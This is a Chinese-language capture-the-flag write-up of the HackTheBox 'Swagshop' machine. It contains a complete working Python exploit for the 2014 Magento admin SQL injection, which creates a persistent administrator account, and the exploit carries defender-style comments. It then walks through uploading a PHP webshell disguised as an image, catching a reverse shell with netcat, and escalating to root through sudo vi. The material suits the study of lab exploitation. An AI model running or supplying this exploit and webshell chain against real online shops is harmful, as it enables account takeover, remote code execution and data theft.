Swagshop
Posted by admin on 2020年2月23日
Swagshop
nmap扫描端口
# Recon: full TCP port sweep first, then a focused scan on only the open ports.
# Step 1: scan all 65535 ports; keep output lines that start with a port number,
# take the number before "/", join with commas and drop the trailing comma.
# (The unquoted ^[0-9] is passed to grep literally only because no file in the
# working directory matches it as a glob; quoting it would be more robust.)
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.140 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
# Step 2: default scripts (-sC) and service/version detection (-sV) on those ports.
nmap -p$ports -sC -sV 10.10.10.140
访问80端口，发现是2014年版本的Magento
Google:magento 2014 exploit
import requests
import base64
import sys
# Script from the writeup for a 2014-era Magento admin-account SQL injection
# (presumably the widely reported Magento "Shoplift" flaw of that period --
# confirm against the installed version before relying on that label).
# Defender notes grounded in what this script does:
#   - Entry point: a POST to /admin/Cms_Wysiwyg/directive/index/ carrying a
#     base64 "filter" parameter; the script sends no session or credentials.
#   - Impact: new rows in admin_user and admin_role, i.e. a persistent
#     administrator account (here forme:forme).
#   - Detection: unexpected inserts into admin_user, and POSTs to this path
#     with a base64-encoded "filter" body.
#   - Mitigation: apply the vendor patch for this issue and restrict or
#     rename the admin path.
# NOTE: print statements and base64.b64encode() on a str -> this is Python 2.
target = "http://10.10.10.140/index.php"
# Normalise the target into "scheme://host[/path]" with no trailing slash.
if not target.startswith("http"):
    target = "http://" + target
if target.endswith("/"):
    target = target[:-1]
# Controller whose filter parameter ends up inside a SQL statement.
target_url = target + "/admin/Cms_Wysiwyg/directive/index/"
# SQL delivered through the filter: builds a password hash as
# md5(salt + password) + ":" + salt (the format the admin login accepts,
# since the writeup logs in with these credentials afterwards), inserts an
# admin_user row and links it to role id 1 via admin_role.
q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO admin_user
(firstname
, lastname
,email
,username
,password
,created
,lognum
,reload_acl_flag
,is_active
,extra
,rp_token
,rp_token_created_at
) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO admin_role
(parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""
# Newlines are stripped so the statement block survives as a single line
# inside the URL-encoded filter; username/password are the hard-coded creds.
query = q.replace("\n", "").format(username="forme", password="forme")
# Grid filter as the controller expects it, with the SQL appended after
# "field_expr" -- this is the parameter a WAF or request log should watch.
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
# ___directive is a fixed base64 layout directive;
# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ
# decodes to {{block type=Adminhtml/report_search_grid output=getCsvFile}}
# (i.e. it renders the report search grid, which is what applies the filter).
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
# r.ok only means the HTTP status was below 400 -- the request was accepted,
# not that the rows were written. The writeup verifies by logging in.
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"
执行脚本
使用forme:forme登陆
系统->配置
高级->开发人员
模板设置->允许符号链接->保存配置
gedit shell.php.png
目录->管理类别:
文件上传至:http://10.10.10.140/media/catalog/category/shell.php.png
新闻稿->新闻稿模板:
输入:
{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}
kali监听:
nc -vlp 1337
保存并预览
get www shell
python3 获取tty shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
get user.txt
sudo -l
sudo /usr/bin/vi /var/www/html/index.php
:!/bin/bash
get root shell
get root.txt